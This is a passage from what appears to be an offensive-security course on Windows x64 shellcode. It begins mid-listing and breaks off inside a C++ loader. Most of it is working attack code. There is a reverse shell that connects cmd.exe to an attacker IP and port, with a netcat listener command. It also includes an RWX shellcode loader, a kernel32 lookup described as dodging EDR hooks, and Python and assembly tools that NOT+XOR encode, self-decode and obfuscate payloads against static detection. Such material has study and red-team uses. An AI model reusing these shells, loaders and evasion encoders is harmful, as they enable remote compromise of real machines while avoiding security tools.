r9, r9 ; lpCallerData = NULL ; remaining NULLs on stack for params 5-7: xor rax, rax push rax push rax push rax sub rsp, 0x20 call WSAConnect add rsp, 0x38 ; ── Populate STARTUPINFOA ── (the most painful part of the reverse shell) ; Fields: cb(DWORD), reserved(PTR), desktop(PTR), title(PTR), ; dwX/Y/XSize/YSize(DWORDs), wShowWindow(WORD), cbReserved2(WORD), ; lpReserved2(PTR), hStdInput/Output/Error(HANDLE) — redirected to socket! ; We push fields in reverse order (stack grows down) xor rax, rax ; hStdError, hStdOutput, hStdInput — all set to socket handle push rdi ; hStdError = socket push rdi ; hStdOutput = socket push rdi ; hStdInput = socket push rax ; lpReserved2 = NULL ; wShowWindow=1 and cbReserved2=0 packed into DWORD, dwFlags=0x100 (STARTF_USESTDHANDLES) push 0x0001010000000000 ; wShowWindow|cbReserved2 + dwFlags=STARTF_USESTDHANDLES push rax ; dwYCountChars/dwXCountChars push rax ; dwYSize/dwXSize push rax ; dwY/dwX push rax ; lpTitle push rax ; lpDesktop push rax ; lpReserved mov eax, 0x68 ; cb = sizeof(STARTUPINFOA) = 104 (0x68) push rax mov rax, rsp ; RAX = &STARTUPINFOA ; ── CreateProcessA(NULL, "cmd.exe", ..., &STARTUPINFOA, &PROCESS_INFORMATION) ── xor rcx, rcx ; lpApplicationName = NULL ; push "cmd.exe" string and set RDX... sub rsp, 0x30 call CreateProcessA add rsp, 0x30 ; ── ExitProcess(0) ── xor rcx, rcx sub rsp, 0x30 call ExitProcess
Replace 0x6401A8C0 (192.168.1.100) and 0x5C11 (port 4444) with your actual attacker IP and port in network byte order before testing. Verify your listener is running: nc -lvnp 4444
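The two constants follow from network byte order: the bytes must sit in memory most-significant first, so the value loaded by a little-endian `mov` looks reversed. The sketch below reproduces the course's example values using Python's standard `socket` and `struct` modules; the helper name is illustrative.

```python
import socket
import struct


def sockaddr_immediates(ip: str, port: int) -> tuple[int, int]:
    """Values to load with `mov` so memory holds the address and port in network order."""
    addr_bytes = socket.inet_aton(ip)        # four bytes, network (big-endian) order
    port_bytes = struct.pack("!H", port)     # two bytes, network order (same as htons)
    # x64 stores immediates little-endian, so read the same bytes back as little-endian ints.
    return int.from_bytes(addr_bytes, "little"), int.from_bytes(port_bytes, "little")


addr_imm, port_imm = sockaddr_immediates("192.168.1.100", 4444)
print(hex(addr_imm), hex(port_imm))
```

Addresses or ports whose bytes include 0x00 (for example 10.0.0.5, or port 256) produce null bytes in the immediate and would need one of the Module 3 techniques.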

07
Module Seven

Pure x64 Assembly Reverse Shell

// No externs. No training wheels. 500+ lines of pure assembly.

Learning Objectives

  • Dynamically resolve all Winsock APIs (WSAStartup, WSASocketA, WSAConnect) via PE walking
  • Load ws2_32.dll at runtime using LoadLibraryA resolved from kernel32
  • Build a complete NULL-free reverse shell in pure position-independent x64 assembly
  • Understand why this is the "final exam" of x64 shellcode development

The Final Exam

This module is the culmination of everything in the course. No externs, no shortcuts — every API is resolved at runtime using the techniques from Modules 2–5. All strings are NULL-free using the techniques from Modules 3–4. The result is position-independent shellcode that can be extracted as raw bytes and executed in any context.

The code is long — 500+ lines — but if you've worked through the previous modules it's not magic. It's the same patterns repeated: PEB walk, PE export walk, string push, API call. The only new complexity is ws2_32.dll (which must be loaded via LoadLibraryA since it's not pre-loaded in most processes) and the full STARTUPINFOA structure population without any extern help.

The complete source for this module is available as a downloadable NASM file in the course materials. The code walkthrough below highlights the key structural sections. Full inline comments explain every instruction.
NASM x64 revshell_pure.asm — structural overview of pure dynamic reverse shell
; revshell_pure.asm — g3tsyst3m Module 7 ; Pure x64 assembly reverse shell — no externs, fully dynamic API resolution ; Full source: see course download. This shows the top-level structure. ; ; === SECTION 1: Prologue + PEB Walk → kernel32 base === BITS 64 section .text global main main: sub rsp, 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 ; PEB → InMemoryOrderModuleList → kernel32 base → R8 mov rax, [gs:0x60] mov rax, [rax+0x18] mov rax, [rax+0x20] mov rax, [rax] mov rax, [rax] mov r8, [rax+0x20] ; R8 = kernel32 base ; === SECTION 2: Resolve GetProcAddress + LoadLibraryA from kernel32 === ; (full PE export table walk — same as Module 2, targeting "GetProcAddress" and "LoadLibraryA") ; Result: R13 = GetProcAddress, R15 = LoadLibraryA ; === SECTION 3: Load ws2_32.dll === ; Push "ws2_32.dll" NULL-free, call LoadLibraryA xor rax, rax mov al, 0x6C shl eax, 0x10 shr eax, 0x10 ; "l\0" push rax mov rax, 0x6C642E32335F3273 ; "s2_32.dl" push rax mov rcx, rsp sub rsp, 0x30 call r15 ; LoadLibraryA("ws2_32.dll") add rsp, 0x30 mov rdi, rax ; RDI = ws2_32.dll base ; === SECTION 4: Resolve WSAStartup, WSASocketA, WSAConnect from ws2_32 === ; For each: push NULL-free encoded name, call GetProcAddress(rdi, name) ; Store results in non-volatile registers / push to stack for later ; === SECTION 5: Resolve CreateProcessA + ExitProcess from kernel32 === ; === SECTION 6: WSAStartup → WSASocketA → WSAConnect === ; Identical logic to Module 6 but calling dynamically resolved addresses ; === SECTION 7: STARTUPINFOA population + CreateProcessA === ; Identical structure to Module 6 — hStdInput/Output/Error = socket ; === SECTION 8: ExitProcess(0) === xor rcx, rcx sub rsp, 0x30 call r14 ; ExitProcess(0)

08
Module Eight

Shellcode Execution & C++ Loaders

// Getting your shellcode off the disk and into memory

Learning Objectives

  • Build a C++ shellcode loader using VirtualAlloc + memcpy + function pointer
  • Understand PAGE_EXECUTE_READWRITE vs. safer VirtualProtect patterns
  • Embed shellcode as a C array and as a file-read from disk
  • Understand why the loader itself is the primary detection surface for modern EDR

The Standard Shellcode Loader

A shellcode loader's job is simple: get the shellcode bytes into executable memory and transfer control to them. The standard approach — VirtualAlloc with PAGE_EXECUTE_READWRITE, memcpy, then cast and call — is functional but heavily signatured by modern EDR. This module teaches the baseline that everything else builds on.

C++ loader.cpp — standard shellcode execution harness
// loader.cpp - g3tsyst3m Module 8
// Standard shellcode execution harness
// Build: cl.exe loader.cpp /link /out:loader.exe
#include <windows.h>
#include <cstring>    // memcpy
#include <iostream>

// Paste your extracted shellcode bytes here:
unsigned char shellcode[] =
    "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9"
    "\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b"
    /* ... full shellcode bytes ... */;

int main() {
    // Allocate RWX memory
    void* exec_mem = VirtualAlloc(
        nullptr,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << "\n";
        return 1;
    }
    // operator<< prints a void* as a hex address
    std::cout << "[+] Allocated " << sizeof(shellcode) << " bytes at 0x" << exec_mem << "\n";

    // Copy shellcode into executable region
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    // Cast to function pointer and execute
    auto sc_func = (void(*)())exec_mem;
    std::cout << "[+] Executing shellcode...\n";
    sc_func();

    // Should not reach here if shellcode calls ExitProcess
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}
Course Complete. You've gone from registers and stack alignment to a fully dynamic NULL-free reverse shell in pure x64 assembly. The code templates and full source files are in your course download. Now go break things — legally. 🐱

09
Module Nine

Python Shellcode Generator — TEB Walk, Extraction & NOT+XOR Encoding

// From .asm to encoded deploy-ready bytes — entirely on Windows, no VM needed

Learning Objectives

  • Write a TEB-based kernel32 locator that defeats EDR hooks on the standard PEB walk path
  • Use Python on Windows to extract raw shellcode bytes from a compiled .obj — no Linux VM required
  • Apply Bitwise NOT + XOR encoding in a single Python script to produce static-analysis-resistant shellcode
  • Understand how embedding the key inside the encoded payload enables self-decoding without hardcoding its position
  • Use the assembly junk-instruction inserter to produce different bytes on every compilation run

Why a New Kernel32 Walk? — Defeating EDR Hooks

The standard PEB walk from Module 2 traverses InMemoryOrderModuleList and trusts list position to find kernel32 — the third entry. This works on clean systems, but some EDR products (notably Avast) hook the initial loader modules. Walking by position can return the hooked version rather than the real kernel32 base.

The solution: instead of trusting position, search the module list for a module whose Unicode name starts with KERN. Unless the EDR names its hook KERNxx.dll, you skip right past the hook and land on the real KERNEL32.DLL. This approach also reaches the PEB through the TEB self-pointer at GS:[0x30] rather than reading GS:[0x60] directly. Both routes read the same field (the PEB pointer at TEB+0x60); the TEB route simply adds one dereference, so the resilience comes from the name search rather than from the starting point.

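Walk chain: GS:[0x30] → TEB base → [TEB+0x60] → PEB → [PEB+0x18] → PEB_LDR_DATA → [Ldr+0x10] → InLoadOrderModuleList (the load-order list; InMemoryOrderModuleList sits at Ldr+0x20) → iterate, checking the Unicode name bytes for KERN. Because each entry is reached through its load-order links, the name buffer pointer is at entry+0x60 and DllBase at entry+0x30.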

NASM x64 calc.asm — TEB-based kernel32 finder + WinExec("calc.exe")
; calc.asm - g3tsyst3m Module 9
; Compile: nasm -fwin64 calc.asm -o calc.obj
; Link:    ld -m i386pep -o calc.exe calc.obj
;
; Key difference from Module 2 PEB walk:
;   - Starts from TEB (GS:[0x30]) not PEB (GS:[0x60]) directly
;   - Searches for Unicode "KERN" rather than trusting list position
;   - Avoids the standard 3rd-entry shortcut that EDR hooks and signatures target

BITS 64
SECTION .text
global main

main:
    sub rsp, 0x28
    and rsp, 0xFFFFFFFFFFFFFFF0
    xor rcx, rcx

    ; ── TEB → PEB ──
    mov rax, [gs:0x30]          ; RAX = TEB base (GS:[0x30] holds the TEB self-pointer)
    mov rax, [rax+0x60]         ; RAX = PEB base (TEB.ProcessEnvironmentBlock at +0x60)

    ; ── PEB → LDR → InLoadOrderModuleList ──
    mov rax, [rax+0x18]         ; RAX = PEB.Ldr (PEB_LDR_DATA*)
    mov rsi, [rax+0x10]         ; RSI = Ldr.InLoadOrderModuleList.Flink (+0x10; InMemoryOrder is +0x20)

    ; ── Walk list searching for Unicode "KERN" ──
checkit:
    mov rsi, [rsi]
    mov rcx, [rsi+0x60]         ; RCX = BaseDllName.Buffer (pointer to the UTF-16LE module name)
    mov rbx, [rcx]              ; RBX = first 8 bytes of Unicode name
    mov rdx, 0x004E00520045004B ; "KERN" in UTF-16LE: K=004B E=0045 R=0052 N=004E
    cmp rbx, rdx
    jz  foundit
    jnz checkit

foundit:
    mov rbx, [rsi+0x30]         ; RBX = DllBase (kernel32 base address)
    mov r8, rbx                 ; R8 = kernel32 base (R8 is volatile; nothing reads it after the WinExec call)

    ; ── Parse Export Address Table ──
    mov ebx, [rbx+0x3C]
    add rbx, r8
    xor rcx, rcx
    add cx, 0x88ff              ; NULL-free way to build 0x88
    shr rcx, 0x8                ; RCX = 0x88
    mov edx, [rbx+rcx]          ; EDX = Export Directory RVA
    add rdx, r8                 ; RDX = Export Directory VMA
    mov r10d, [rdx+0x14]
    xor r11, r11
    mov r11d, [rdx+0x20]
    add r11, r8
    mov rcx, r10

    ; ── Push "WinExec" using NOT encoding + SHL/SHR null termination ──
    mov rax, 0x6F9C9A87BA9196A8 ; NOT-encoded "WinExec": no plaintext in bytes
    not rax                     ; decode: RAX = 0x90636578456E6957
    shl rax, 0x8
    shr rax, 0x8                ; RAX = "WinExec\0": null in MSB, not in shellcode bytes
    push rax
    mov rax, rsp
    add rsp, 0x8

    ; ── Search AddressOfNames for "WinExec" ──
kernel32findfunction:
    jecxz FunctionNameNotFound
    xor ebx, ebx
    mov ebx, [r11+rcx*4]
    add rbx, r8
    dec rcx
    mov r9, [rax]
    cmp [rbx], r9
    jz  FunctionNameFound
    jnz kernel32findfunction

FunctionNameNotFound:
    int3

FunctionNameFound:
    inc ecx
    xor r11, r11
    mov r11d, [rdx+0x1c]
    add r11, r8
    mov r15d, [r11+rcx*4]
    add r15, r8                 ; R15 = WinExec VMA

    ; ── Call WinExec("calc.exe", 1) ──
    xor rax, rax
    push rax
    mov rax, 0x9A879AD19C939E9C ; NOT-encoded "calc.exe"
    not rax
    push rax
    mov rcx, rsp
    xor rdx, rdx
    inc rdx
    sub rsp, 0x30
    call r15
The Unicode comparison value 0x004E00520045004B encodes "K E R N" as UTF-16LE WORD pairs: K=004B, E=0045, R=0052, N=004E stored as an 8-byte little-endian immediate. A single cmp rbx, rdx checks all four characters simultaneously.
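The immediate can be checked with a few lines of Python. This is a minimal sketch: the helper name utf16le_qword is hypothetical and not part of the course tooling. It encodes a four-character prefix as UTF-16LE and reads the eight bytes back as a little-endian 64-bit integer, which is the value mov rbx, [rcx] would load.

```python
import struct


def utf16le_qword(prefix: str) -> int:
    """Pack a 4-character name prefix into the 64-bit value that a
    QWORD load from a UTF-16LE name buffer would produce.
    (Hypothetical helper, for illustration only.)"""
    raw = prefix.encode("utf-16-le")      # 2 bytes per BMP character
    if len(raw) != 8:
        raise ValueError("need exactly four BMP characters")
    return struct.unpack("<Q", raw)[0]    # little-endian unsigned 64-bit


if __name__ == "__main__":
    print(f"0x{utf16le_qword('KERN'):016X}")  # 0x004E00520045004B
```

The comparison is byte-exact, so the prefix has to use the same casing as the name stored in memory.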

Tool 1 — findhex.py: Windows-Native Shellcode Extraction

Extracting raw shellcode bytes from a compiled .obj file historically required Linux tools. This Python script runs on Windows using the MinGW-bundled objdump. It parses the disassembly output, strips the byte columns, and outputs them as \xNN escape sequences ready to paste into a loader — no VM, no Linux, no context switch.

Python findhex.py — extract \xNN shellcode bytes from .obj on Windows
# findhex.py - g3tsyst3m Module 9
# Extracts raw shellcode bytes from a NASM-compiled .obj file
# Requires: MinGW objdump in PATH (included with the NASM/MinGW toolchain)
# Usage:  python findhex.py calc.obj
# Output: \x4d\x87\xe6\x48... printed to stdout

import re
import subprocess
import sys


def generateshellcode(obj_file):
    result = subprocess.run(
        ['objdump', '-D', obj_file],
        capture_output=True, text=True, check=True
    )
    objdump_output = result.stdout

    # Replace " <" so the tail of the address on a label line such as
    # "0000000000000000 <main>:" is no longer followed by a space and
    # therefore doesn't match the hex regex
    objdump_output = objdump_output.replace(" <", "--|")

    # Match exactly two hex chars followed by a space: the byte column format.
    # The negative lookbehind skips pairs preceded by a letter, such as the
    # "dd " inside the mnemonic "add ".
    pattern = r'(?<![a-zA-Z])[0-9a-fA-F]{2} '
    matches = re.findall(pattern, objdump_output, flags=re.IGNORECASE)

    prefixed_hex = [r'\x' + m.strip() for m in matches]
    print(''.join(prefixed_hex))


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python findhex.py <.obj file>")
        sys.exit(1)
    generateshellcode(sys.argv[1])
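To see what the regex keeps and what it drops, it can be run on a short hand-written listing. This is a sketch only: the SAMPLE text imitates the usual objdump column layout (address, tab, byte column, tab, mnemonic) and is an assumption, not captured tool output. The helper name extract_bytes is also hypothetical.

```python
import re

# Hand-written imitation of objdump -D output (assumed layout).
SAMPLE = (
    "0000000000000000 <main>:\n"
    "   0:\t48 83 ec 28          \tsub    rsp,0x28\n"
    "   4:\t48 31 c9             \txor    rcx,rcx\n"
    "   7:\t48 01 c3             \tadd    rbx,rax\n"
)


def extract_bytes(listing: str) -> str:
    """Apply the same two steps as findhex.py to a listing string."""
    # Neutralise the "address <label>" form so address digits never
    # sit directly in front of a space.
    listing = listing.replace(" <", "--|")
    # Two hex digits followed by a space, not preceded by a letter.
    pairs = re.findall(r'(?<![a-zA-Z])[0-9a-fA-F]{2} ', listing)
    return ''.join('\\x' + p.strip() for p in pairs)


if __name__ == "__main__":
    print(extract_bytes(SAMPLE))
```

Only the byte column survives. Operands such as 0x28 are followed by a newline rather than a space, and the "dd " inside "add " is rejected by the lookbehind.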

Tool 2 — NOT + XOR Encoder with Embedded Key

This encoder applies Bitwise NOT to every byte first, then XORs with a chosen key (default 0xAC). The result contains no recognizable API name strings and no common shellcode byte patterns. What makes it especially useful: the XOR key is embedded inside the encoded payload at position key_value % payload_length. Change the key and both the encoded bytes and the key's position in the output change — two layers of variability from one parameter.

The decoder stub undoes the two steps: XOR each byte with the key, then NOT. Both operations are self-inverse, so the decode loop has the same structure as the encode loop.
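The round trip is easy to confirm on neutral test data. The sketch below uses hypothetical helper names (encode, decode) and runs over every possible byte value instead of real shellcode. It also shows a property worth knowing: NOT is the same as XOR with 0xFF, so NOT followed by XOR with a key equals a single XOR with key ^ 0xFF.

```python
def encode(data: bytes, key: int) -> bytes:
    """NOT each byte, then XOR it with the key."""
    return bytes(((~b) & 0xFF) ^ key for b in data)


def decode(data: bytes, key: int) -> bytes:
    """XOR each byte with the key, then NOT it."""
    return bytes(~(b ^ key) & 0xFF for b in data)


if __name__ == "__main__":
    key = 0xAC
    sample = bytes(range(256))          # every byte value once

    # Round trip restores the input exactly.
    assert decode(encode(sample, key), key) == sample

    # NOT + XOR(key) equals one XOR with (key ^ 0xFF).
    combined = key ^ 0xFF               # 0x53 for key 0xAC
    assert encode(sample, key) == bytes(b ^ combined for b in sample)

    print(f"0x00 encodes to 0x{encode(bytes([0]), key)[0]:02x}")
```

With key 0xAC the combined constant is 0x53, which is why original 0x00 bytes appear as 0x53 in the encoded output.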

Python not_xor_encoder.py — Bitwise NOT + XOR with embedded key discovery
# not_xor_encoder.py - g3tsyst3m Module 9
# Two-pass encoder: NOT every byte, then XOR with key
# The key byte is embedded in the output at position (key % len): self-locating
# Usage: paste findhex.py output into the shellcode variable, then run this script
# Change xor_key to any non-null byte; 0xAC avoids bad chars for this shellcode

# Paste findhex.py output here:
shellcode = (
    b"\x4d\x87\xe6\x48\x83\xec\x28\x48\x8d\x3f\x48\x83\xe4\xf0"
    # ... full shellcode from findhex.py
)

xor_key = 0xAC

# Step 1: Bitwise NOT every byte
not_encoded = bytearray((~b) & 0xFF for b in shellcode)

# Step 2: XOR with key
not_xor = bytearray(b ^ xor_key for b in not_encoded)

# Step 3: Embed key at deterministic position
#   Position = key_value % payload_length
#   Changing the key changes both the encoded bytes AND the position
key_pos = xor_key % len(not_xor)
encoded = bytearray(not_xor)
encoded.insert(key_pos, xor_key)

result = ''.join(f'\\x{b:02x}' for b in encoded)

print(f"[*] Encoded shellcode ({len(encoded)} bytes):")
print(result)
print()
print(f"[*] XOR key: 0x{xor_key:02x}")
print(f"[*] Key position: offset {key_pos} in encoded output")
print(f"[*] Decode at runtime: XOR each byte with key, then NOT")
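The position rule can be explored in isolation on dummy data. In the sketch below, embed_key and extract_key are hypothetical helper names. Removing the key byte again before decoding is an assumption of this sketch, not something the course's decoder is shown doing.

```python
def embed_key(encoded: bytes, key: int) -> tuple[bytearray, int]:
    """Insert the key byte at offset key % len(encoded)."""
    pos = key % len(encoded)
    out = bytearray(encoded)
    out.insert(pos, key)
    return out, pos


def extract_key(blob: bytes, pos: int) -> tuple[int, bytes]:
    """Read the key at a known offset and return the blob without it.
    (Stripping the key byte is this sketch's own assumption.)"""
    key = blob[pos]
    return key, bytes(blob[:pos]) + bytes(blob[pos + 1:])


if __name__ == "__main__":
    dummy = bytes(100)                      # 100 placeholder bytes
    for key in (0xAC, 0x7F):
        blob, pos = embed_key(dummy, key)
        got_key, rest = extract_key(blob, pos)
        assert got_key == key and rest == dummy
        print(f"key 0x{key:02x} -> offset {pos}")
```

For a 100-byte input the offsets are 72 and 27. Once the payload is longer than 255 bytes the modulo no longer wraps and the offset is the key value itself (172 for 0xAC). The index to use in a decoder is therefore whatever the encoder prints for that specific build.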

Tool 3 — The NOT+XOR Decoder in x64 Assembly

With the shellcode encoded, the runtime decoder needs to reverse both operations in correct order: XOR each byte with the key first, then NOT each byte. Because both NOT and XOR are self-inverse, the decode loop is structurally identical to how you'd write the encode — just applied at runtime in memory rather than at script time.

The key lives inside the encoded shellcode at a known index position — printed by the encoder script. For the example below, key index 38 was chosen: mov r9b, [rel encoded_shellcode + 38]. The decoder reads the key directly from the payload, walks every byte applying XOR then NOT, then reloads the base address and jumps to the now-restored shellcode via jmp rax.

NASM x64 decoder.asm — NOT+XOR decoder stub with encoded shellcode inline in .text
; decoder.asm — g3tsyst3m Module 9 ; Compile: nasm -fwin64 decoder.asm ; Link: ld -m i386pep -N -o decoder.exe decoder.obj ; ; -N flag: makes .text section writable+executable (needed because the decoder ; writes decoded bytes back into encoded_shellcode in-place at runtime) ; ; Key index 38 was chosen from the not_xor_encoder.py output — the offset where ; the encoder embedded key byte 0xAC inside the encoded payload. BITS 64 section .data section .text global main main: ; ── Load base address of encoded_shellcode RIP-relative ──────────── lea rsi, [rel encoded_shellcode] ; ── Read the embedded key from its known index in the payload ────── mov r9b, [rel encoded_shellcode + 38] ; R9B = XOR key (0xAC at index 38) ; ── Set loop counter = payload length ────────────────────────────── mov rcx, encoded_shellcode_len ; immediate value, no rel needed for EQU decode_loop: mov al, [rsi] ; AL = current encoded byte xor al, r9b ; AL ^= key → reverses XOR encoding step not al ; AL = ~AL → reverses NOT encoding step mov [rsi], al ; write original byte back in-place inc rsi ; advance pointer loop decode_loop ; dec RCX, repeat until zero ; ── Jump to fully decoded shellcode ──────────────────────────────── lea rax, [rel encoded_shellcode] ; reload base (RSI advanced past end during decode) jmp rax ; execute the now-decoded calc shellcode ; ── NOT+XOR encoded payload — inline in .text ─────────────────────── ; Generated by not_xor_encoder.py on the TEB-walk calc.asm shellcode. ; Key 0xAC embedded at offset 38 (the 0xAC byte at position [38]). 
encoded_shellcode: db 0x1e,0xd4,0xb5,0x1b,0xd0,0xbf,0x7b,0x1b,0xde,0x6c,0x1b,0xd0,0xb7,0xa3 db 0x1e,0xd4,0xa7,0x1b,0x62,0x9a,0x1a,0xd4,0xaf,0x36,0x1b,0xd8,0x57,0x76 db 0x63,0x53,0x53,0x53,0x1b,0xd8,0x13,0x33,0x1b,0x62,0xac,0x1b,0xd8,0x13 db 0x4b,0x1a,0xd4,0xad,0x1b,0xd8,0x23,0x43,0x1b,0xd0,0x94,0x53,0x1b,0xd8 db 0x65,0x1f,0xd4,0xbc,0x1b,0xd8,0x1d,0x33,0x1f,0xd4,0xbc,0x1b,0xd8,0x4a db 0x1e,0xd4,0xbf,0x1b,0xe9,0x18,0x53,0x16,0x53,0x01,0x53,0x1d,0x53,0x1b db 0x62,0xac,0x1b,0x6a,0x80,0x27,0x5b,0x1a,0xd4,0xaf,0x26,0x85,0x1f,0xd4 db 0xb4,0x1b,0xd8,0x0d,0x63,0x1e,0xda,0xa5,0x1a,0xda,0x8b,0x1e,0xd4,0xb6 db 0xd8,0x08,0x6f,0x1e,0x38,0xb7,0x52,0x1f,0x52,0x90,0x1e,0xda,0xb7,0x1b db 0x62,0x9a,0x1a,0x92,0xb6,0x53,0x35,0xd2,0x92,0xac,0xdb,0x1e,0xd4,0xbd db 0x1b,0x92,0xba,0x5b,0x1a,0x92,0x9f,0x53,0xd8,0x47,0x58,0x1f,0xd4,0xb4 db 0x1f,0x52,0x91,0x1e,0xda,0xbe,0x17,0xd8,0x01,0x47,0x1e,0x62,0xbe,0x1e db 0x62,0x88,0x1a,0xd0,0xbf,0x53,0x17,0xd8,0x09,0x73,0x1a,0xd0,0xad,0x53 db 0x1e,0x52,0x90,0x1e,0xd4,0xbd,0x1f,0xda,0x82,0x1f,0xd4,0xbc,0x1b,0xeb db 0xfb,0xc5,0xc2,0xe9,0xd4,0xc9,0xcf,0x3c,0x1b,0x92,0x9c,0x53,0x1b,0xa4 db 0x83,0x1a,0xd4,0xae,0x1b,0x92,0xb3,0x5b,0x1e,0xda,0xbe,0x1b,0x92,0xbb db 0x5b,0x1e,0xd4,0xb5,0x03,0x1e,0xd6,0xa5,0x1b,0xda,0xb3,0x1a,0xd4,0xad db 0x1b,0xd0,0x97,0x5b,0x1e,0xda,0xb7,0x34,0xb0,0x63,0x1a,0xd4,0xad,0x62 db 0x88,0x1a,0xd4,0xaf,0x12,0xd8,0x4f,0xd8,0x1b,0x92,0xb4,0x53,0x1f,0x52 db 0x90,0x1e,0xd4,0xb5,0x1b,0xac,0x9a,0x1a,0xd4,0xaf,0x1f,0xd8,0x5b,0x1e db 0xd4,0xa7,0x1f,0x6a,0x58,0x27,0x5e,0x1e,0xd4,0xbd,0x26,0x82,0x1a,0x92 db 0xb5,0x53,0x9f,0x1a,0xd4,0xaf,0xac,0x92,0x1e,0xd6,0xb7,0x1e,0x62,0x88 db 0x1e,0xd4,0xa7,0x17,0xd8,0x09,0x4f,0x1f,0xd4,0xa4,0x1e,0x52,0x90,0x1e db 0xd4,0xbf,0x16,0xd8,0x6f,0xd8,0x1a,0xd4,0xad,0x1e,0x52,0x94,0x1e,0x62 db 0xa5,0x1b,0x62,0x93,0x1a,0xd0,0x96,0x53,0x03,0x1a,0xd4,0xae,0x1b,0xeb db 0xcf,0xcd,0xc0,0xcf,0x82,0xc9,0xd4,0xc9,0x1a,0xd0,0xaf,0x53,0x1b,0xa4 db 0x83,0x1e,0xd4,0xbd,0x03,0x1a,0xd4,0xad,0x1b,0xda,0xb2,0x1e,0xd6,0xb7 db 
0x1b,0x62,0x81,0x1e,0xd4,0xbd,0x1b,0xac,0x91,0x1a,0xd4,0xad,0x1b,0xd0 db 0xbf,0x63,0x1a,0xd4,0xaf,0x12,0xac,0x84,0x1e,0xd4,0xa7,0x53,0x53,0x53 db 0x53,0x53 encoded_shellcode_len equ $ - encoded_shellcode
The -N linker flag (--omagic) marks the .text section writable+executable. This is required for the standalone test binary because the decoder writes decoded bytes back into encoded_shellcode in-place — which lives in .text. The C++ loader below uses PAGE_EXECUTE_READWRITE VirtualAlloc memory instead, so -N is not needed there.

Tool 4 — Alpha/Mix Encoding: Converting to ASCII-Printable Shellcode

The final encoding layer converts the complete payload (decoder stub + encoded shellcode) into a mixed ASCII/hex format where each byte is expressed as its printable ASCII character if one exists, and as a \xNN hex escape otherwise. This is the "alpha/mix" format — not purely alphanumeric, but as human-readable as the byte values allow, and compatible with C string literal delivery.

The workflow: compile decoder.asm to a .obj, run findhex.py on it to extract all bytes (decoder stub bytes + inline encoded shellcode), then pass that full byte string through the alpha/mix script. The output pastes directly into a C const unsigned char shellcode[] string literal — adjacent tokens are concatenated automatically by the compiler.
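Restricting the printable form to 7-bit ASCII matters. A byte such as 0xB9 has a printable Latin-1 glyph, but written literally into a UTF-8 source file it occupies two bytes, which would silently alter the payload. The sketch below illustrates the rule with a hypothetical helper, c_token; it is not the course's script.

```python
def c_token(b: int) -> str:
    """Render one byte as a quoted C string token.
    Printable ASCII stays literal; everything else becomes \\xNN."""
    if b in (0x22, 0x5C):                 # " and \ need a backslash in C
        return f'"\\{chr(b)}"'
    if 0x21 <= b <= 0x7E:                 # printable ASCII, space excluded
        return f'"{chr(b)}"'
    return f'"\\x{b:02x}"'                # control, space, and >= 0x7F


if __name__ == "__main__":
    data = bytes([0x48, 0x8D, 0x35, 0x23, 0x00, 0xB9])
    print(' '.join(c_token(b) for b in data))

    # Why 0xB9 must not be written as its glyph: one byte in, two bytes out.
    glyph = chr(0xB9)
    print(len(glyph.encode("utf-8")))
```

Keeping each byte in its own token also prevents a \xNN escape from absorbing a following hex-digit character, because C processes escape sequences before it concatenates adjacent literals.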

Python alpha_mix.py — convert binary shellcode bytes to mixed ASCII/hex C string tokens
# alpha_mix.py - g3tsyst3m Module 9
# Converts binary shellcode to mixed ASCII/hex format for C string literals.
# Printable ASCII bytes → their ASCII character. Everything else → \xNN escape.
# Special cases handle ' and " to avoid breaking C string literal syntax.
#
# Input:  hex_list = full payload bytes from findhex.py on the decoder .obj
#         (includes decoder stub bytes + encoded_shellcode bytes inline)
# Output: space-separated string tokens to paste into shellcode[] in loader.cpp

# Paste findhex.py output from decoder.obj here:
# (this is the full combined payload: decoder stub + encoded shellcode)
hex_list = (
    b"\x48\x8d\x35\x23\x00\x00\x00\x44\x8a\x0d\x42\x00\x00\x00"
    b"\xb9\x98\x01\x00\x00\x8a\x06\x44\x30\xc8\xf6\xd0\x88\x06"
    b"\x48\xff\xc6\xe2\xf2\x48\x8d\x05\x02\x00\x00\x00\xff\xe0"
    # ... followed by all encoded_shellcode bytes
)

alphanumericfinal = []
for bytey in hex_list:
    if bytey == 0x27:        # single quote: C literal syntax break
        alphanumericfinal.append("\"\\'\"")
    elif bytey == 0x22:      # double quote: C literal syntax break
        alphanumericfinal.append('\"\\""')
    elif bytey == 0x20:      # space: explicit hex to avoid ambiguity
        alphanumericfinal.append("\"\\x20\"")
    elif bytey >= 0x80:      # non-ASCII: repr() would emit a Latin-1 glyph,
        # which a UTF-8 source file stores as two bytes, so force \xNN
        alphanumericfinal.append('"\\x%02x"' % bytey)
    else:
        r = repr(chr(bytey))
        r = r.replace("'", '"')   # swap repr single quotes → double quotes
        alphanumericfinal.append(r)

print(' '.join(alphanumericfinal))  # space-separated: "H" "\x8d" "5" "#" ...

The Final C++ Loader

The alpha/mix output pastes directly into the shellcode[] array. The decoder stub runs first, decodes the embedded payload in-place, then jmp rax executes the original TEB-walk calc shellcode. PAGE_EXECUTE_READWRITE is required because the decoder modifies its own payload bytes at runtime — read+execute alone is insufficient.

C++ loader.cpp — final shellcode loader using the alpha/mix encoded payload
// loader.cpp - g3tsyst3m Module 9
// Paste alpha_mix.py output into shellcode[] below as adjacent string literals.
// The compiler concatenates them into a single continuous byte array.
// Bytes >= 0x80 are written as \xNN escapes so the source file's text
// encoding cannot change them.
// Compile: x86_64-w64-mingw32-g++ -o loader.exe loader.cpp

#include <windows.h>
#include <cstring>
#include <iostream>

const unsigned char shellcode[] =
    "H" "\x8d" "5" "#" "\x00" "\x00" "\x00" "D" "\x8a" "\r" "B" "\x00" "\x00" "\x00"
    "\xb9" "\x98" "\x01" "\x00" "\x00" "\x8a" "\x06" "D" "0" "\xc8" "\xf6" "\xd0" "\x88" "\x06"
    "H" "\xff" "\xc6" "\xe2" "\xf2" "H" "\x8d" "\x05" "\x02" "\x00" "\x00" "\x00" "\xff" "\xe0"
    /* ... paste full alpha_mix.py output here ... */
    ;

int main() {
    size_t shellcode_size = sizeof(shellcode);

